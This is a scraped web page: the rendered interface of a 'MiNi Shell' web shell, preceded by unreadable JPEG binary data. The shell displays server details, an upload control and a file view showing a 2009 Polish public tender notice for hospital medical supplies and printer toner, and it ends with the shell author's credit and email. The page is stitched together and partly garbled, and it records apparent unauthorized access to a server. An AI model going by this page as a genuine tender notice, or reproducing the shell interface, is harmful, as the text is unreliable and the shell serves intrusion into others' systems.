JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090715/111981-N-2009.html

<p class="kh_header"><b>Radzymin: Zakup i dostawa materiałów medycznych sprzętu jednorazowego użytku i materiałów opatrunkowych, tuszy i tonerów szczegółowo określonych w załączniku Nr1  do SIWZ.</b><br>
<b>Numer ogłoszenia: 111981 - 2009; data zamieszczenia: 15.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Konstytucji 3 Maja 17, 05-250 Radzymin, woj. mazowieckie, tel. 022 7865037, faks 022 7865037.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.radzymin.com</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.spzzoz-radzymin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa materiałów medycznych sprzętu jednorazowego użytku i materiałów opatrunkowych, tuszy i tonerów szczegółowo określonych w załączniku Nr1  do SIWZ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet Nr 1    - materiały medyczne i sprzęt jednorazowego użytku     33140000-3
1. 	Przyrząd do przetaczania płynów infuzyjnych  typ IS	2900 szt   
2.	Przyrząd do przetaczania krwi  typ TS	50 szt 
3.	Przedłużacz do pompy infuzyjnej KZ-11 jałowy, niepirogenny, nietoksyczny.	100  szt
4.	Worki do moczu 2000 ml  nie sterylne	500  szt
5.	Szpatułki drewniane	15600 szt
6.	Veuflon   0,8 	450 szt
7.	Veuflon   1.0	550 szt
8.	Veuflon   1,2	 150 szt
9.	Veuflon   1.4	 20 szt  
10.	Veuflon   1,7	 20 szt
11.	Ostrze chirurgiczne  21	300
12.	Ostrze chirurgiczne  23	300
13.	Ostrze chirurgiczne  11 	300
14.	Prześcieradła papierowe rolki	 15 rolek
15.	Wziernik ginekologicz. Średni  Nr M	   1000 szt
16.	Pojemnik na zużyte igły 1 L	   50 szt
17.	Żel do USG   500 g	   120
18.	Szkiełka do cyt.	1000

19.	Paski  do gleukometru Accu-Chek Active	30 op.
Pakiet  Nr  2  -  materiały i sprzęt jednorazowego użytku strzykawki  33141310-6
1.	Strzykawka  Luer  20 ml. plastik	8200 szt  
2.	Strzykawka  Luer  5 ml. plastki	12300 szt  
3.	Strzykawka  Luer  10 ml. plastki	10600 szt  
4.	Strzykawka  Luer  2 ml. plastki	10400 szt  
5.	Strzykawki insulinowe  1 ml. 	500  szt 
6.	Strzykawki do pompy infuzyjnej   20ml.	250  szt
Pakiet  Nr  3  -  sprzęt jednorazowego użytku cewniki  33141200-2
1.	Cewnik  Foley dwudrożny silikonowane.Nr16	40  szt
2.	Cewnik  Foley dwudrożny silikonowane.Nr18	 100  szt
3.	Cewnik Foley dwudrożny silikonowane. Nr20	150  szt
4.	Cewnik Foley dwudrożny  silikonowane.Nr22	150  szt
5.	Cewnik Foley dwudrożny silikonowane. Nr24	 50  szt
6.	Cewnik Foley  10  
20 szt w op.	10 op.
7.	Cewnik Tiemana  Nr 14	10 szt
8.	Cewnik Tiemana  Nr 16	10 szt
		
9.	Cewnik Tiemana  Nr 18	10 szt
10.	Cewnik Tienana Nr 20	10 szt.
Pakiet  Nr  4  -  sprzęt jednorazowego użytku  igły  33141320-9
1.	Igła luer   0,60 x 25   23 x 1 	4000 szt
2.	Igła luer  0,50x25    25 GA 1	4000 szt
3.	Igła  luer  0,70 x 30   22G x 1 ? 	4400 szt
4.	Igła luer  0,80 x 40    21G x 1 ? 	7600 szt
5.	Igła luer  0,90 x 40  20G x 1 ?    	10600 szt
6.	Igła luer  1,1 x 40    19G x 1 ? 	4000 szt
7.	Igła luer  1,2 x 40   18G x 1 ? 	1600 szt
8.	Igła  luera   0,45 x 23  	3000 szt        
9.	Igła  luera   0,45 x 13 	1000 szt
Pakiet  Nr  5  -  materiały i sprzęt jednorazowego użytku  nici  33140000-3
1.	Amifil nici chirurgiczne 0/0	   10 szt

2.	Amifil nici chirurgiczne 0/1	   10 szt

3.	Amifil nici chirurgiczne 2/0	   10 szt

4.	Amifil nici chirurgiczne 3/0	   10 szt

5.	Amifil nici chirurgiczne 4/0	   10 szt
  
6.	Safil nici chirurgiczne podskórne 1/0	   10 szt
7.	Safil nici chirurgiczne podskórne 2/0	   10 szt
8.	Safil nici chirurgiczne podskórne 3/0	   10 szt
9.	Safil nici chirurgiczne podskórne 4/0	   10 szt
Pakiet Nr 6 - sprzęt jednorazowego użytku  worki  33157700-2
1.	Worki czerwone duże mocne 120 l	50 szt w op.	300 op.
2.	Worki czerwone małe  mocne 35 l	50 szt. w op.	500 op.
Pakiet  Nr  7  -   sprzęt jednorazowego użytku  płyny    33741200-8
1.	Aerodesin  2000 ( płyn dezynfekujący )	  1 L	20
2.	Javel  (płyn dezynfekujący )	  5 L 	1
Pakiet  Nr  8  -  sprzęt jednorazowego użytku    rękawice  33141420-0  
1	Rękawice latex beztalkowe z witaminą E  rozmiar S	10000 szt
2	Rękawice latex beztalkowe z witaminą E  rozmiar L	3000 szt
3	Rękawice  latex  beztalkowe z witaminą E  rozmiar M	3000 szt
4	Rękawice winilowe  S	2000 szt
5	Rękawice winilowe M	2000 szt
6	Rękawice chirurg. stery.   7,5	 1000 
szt  
7	Rękawice chirurg. stery.   8,5 	   500 
szt 
8	Rękawice pudrowe S	5000
szt
Pakiet  Nr 9  -  materiały opatrunkowe    33141100-1
1.	Opaska dziana   4 x 10 	 2250  szt	18 kart.      
2.	Opaska dziana   4 x 15	 1080  szt	12 kart. 
3.	Opaska dziana   4 x 5 	  860  szt   	
4.	Opaska elastyczna   4 x 10	    20  szt	
5.	Opaska elastyczna   4 x 15	    20  szt	
6.	Gaza opatrunkowa    200 x 90	 1300  mb	
7.	Gaza sterylna   1 x 1 m	75  szt	
8.	Gaza opatrunkowa sterylna    1 x ?   m2	80  szt	
9.	Wata  opatrunkowa 0,5 kg	 60  kg   	
10.	Lignina płaty	  300  kg   	
11.	Poloplast   5m x 2,5  cm	100  szt. 	5 opak. 
12.	Polopor   5m x 2,5  cm	240  szt	5 opak. 
13.	Plaster Polovis   5 m  x  50 mm	108   szt.	
14.	Plaster Polofix 100 cm x 10 mb. 	1 szt.	3 op.
15.	Plaster  Prestopor   1 m  x 60 mm	30 szt	
16.	Opaski gipsowe   3x  120 mm	20 szt	
17.	Plaser omnifix E 10 cm x 10 mb.	30 szt	
18.	Plaster Omnifix C  15 cm x 10 mb.	30 szt.	
19.	Kaniula Plast 8 mm x 6 mm	1300 szt.	
20.	Opaska gipsowa   3x 140 mm	20  szt	
21.	Kompres bawełniany 
nie jałowy 7x7 cm	6000 szt	12 pacz.
22.	Kompres bawełniany nie jałowy 9x9 cm	3500 szt	
23.	Kompres bawełniany nie jałowy  5x5 cm	7000 szt	
24.	Canula  Plast 8x 6 cm 	2500 szt.	
25.	Gaza sterylna 1x1/4 m	100 szt.	
Zadanie Nr 10 -  Tusze i tonery   oryginały   KOD   CPV 22600000-6
1	Toner  do ksero Canon 
C-EXV 14	20 
2	Toner  do kserokopiarki TOSHIBA  T1 550E	3
3	Tusz HP C 6578 A	4

4	Tusz HP C 6615D	6

5	Tusz HP C6656A	25

6	Tusz HP C6657A	20

7	Tusz HP C87677EE	20

8	Tusz HP  C9352A
	10
9	Tusz HP C9361EE	10

10	Tusz HP C9351A	10

11	Tusz HP C9362EE	25

12	Tusz Canon CL-41	8

13	Tusz Canon PG-40	8

14	Tusz Canon BX-3	10

15	Tusz HP C 8766E	15

16	Toner HP Q 2612A	15

17	Toner HP Q 2613A	10

18	Toner HP C 409A	15

19	Toner HP CB436A	12

20	Toner CB436A	20.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.13.10-6, 33.14.12.00-2, 33.14.13.20-9, 33.14.00.00-3, 33.15.77.00-2, 33.74.12.00-8, 33.14.14.20-0, 33.14.11.00-1, 22.60.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnisienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1. Złożą ofertę w pełni spełniającą wymagania niniejszej SIWZ.
2. Posiadają uprawnienia do wykonywania działalności w przedmiocie zamówienia.
3. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym             i osobami zdolnymi do wykonania zamówienia.
4. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej terminową realizację zamówienia przy założeniu, że zapłata za realizację zamówienia będzie odbywać się na warunkach określonych w niniejszej SIWZ tzn. nie wcześniej niż 30 dni od dnia otrzymania faktury VAT.
5. Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy - Prawo zamówień publicznych.
6. Jeżeli oferta Wykonawców, o których mowa w art.23 ust.1 ustawy ( Wykonawcy wspólnie ubiegający się o udzielenie zamówienia), zostanie wybrana, zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Formularz ofertowy - wg. załączonego wzoru.
2.	Formularz cenowy wg.  Załącznika Nr 1do SIWZ  .
3.	Oświadczenie, że spełniają warunki określone w art. 22 ust. 1 i nie podlegają wykluczeniu z postępowania na mocy art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych - stanowiące Załącznik Nr  2  do SIWZ.
4.	Koncesja lub zezwolenie na prowadzenie hurtowni farmaceutycznej.
5.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
7.	Aktualna informacja z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
8.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 - ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
9.	Wykaz wykonywanych w okresie ostatnich trzech lat dostaw w przedmiocie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia z podaniem, ich wartości, przedmiotu, daty wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że dostawy te zostały wykonane należycie . 
10.	Polisa lub inny dokumentu ubezpieczenia potwierdzający, że WYKONAWCA jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
11.	Koncesje , zezwolenia lub licencje , jeżeli ustawy nakładają obowiązek posiadania koncesji , zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem .
12.	Parafowany  wzór umowy.   Załączniki Nr  4  do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.spzzoz-radzymin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespoł Zakładów Opieki Zdrowotnej w Radzyminie ul. Konstytucji 3 Maja 17  pok. 214   II piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2009 godzina 10:30, miejsce: Ofertę należy złożyć  w Samodzielnym Publicznym Zespole Zakładów Opieki Zdrowotnej w Radzyminie ul. Konstytucji 3 Maja 17  pok. 214   II piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 23.08.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com